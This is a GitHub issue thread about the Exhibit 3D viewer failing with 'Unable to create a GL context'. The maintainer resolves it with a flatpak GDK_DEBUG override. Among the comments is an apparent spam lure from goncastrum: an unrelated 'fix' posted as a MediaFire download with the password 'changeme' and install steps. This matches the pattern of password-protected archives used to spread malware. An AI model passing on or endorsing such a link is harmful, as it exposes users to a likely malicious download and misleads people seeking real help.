### ISSUE TITLE
Unable to create a GL context; add Vulkan support

### ISSUE THREAD

**Issue by Itschotsch** [Nokse22/Exhibit#32]
# Description
After installing the application via Flathub and opening an FBX model, I get the following error: "Unable to create a GL context"
I assume OpenGL does not work on my Zorin OS installation. Thus, it would be great to have Vulkan support.
Also, notice that this does not seem to be the same issue as in https://github.com/Nokse22/Exhibit/issues/14 as `gl-prefer-gl` is set and does not help.

# Debug information
```
GDK_DEBUG: gl-egl:gl-prefer-gl
GSK_RENDERER: gl

=========== F3D Info ===========
Version: 2.5.0
Version Full: 2.5.0
Build Date: 2024-07-31 15:10:08
Build System: Linux 64-bits
Compiler: GNU 13.2.0
Raytracing Module: OFF
External Rendering Module: ON
OpenEXR Module: ON
VTK Version: 9.3.1
Previous Copyright: Copyright (C) 2019-2021 Kitware SAS
Copyright: Copyright (C) 2021-2024 Michael Migliore, Mathieu Westphal
License: BSD-3-Clause
Authors: Michael Migliore, Mathieu Westphal and Joachim Pouderoux
```

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Nokse22** [comment]
Hello, can you try to run `flatpak override --env=GDK_DEBUG=gl-prefer-gl io.github.nokse22.Exhibit` anyway, because I think I might have to do something different. Or did you already try?

**Comment by Itschotsch** [comment]
This worked indeed! Thank you a lot! Would be great to have this option in the application's settings. :)

**Comment by Nokse22** [comment]
It is supposed to work without changing anything, I have to fix this. 😅
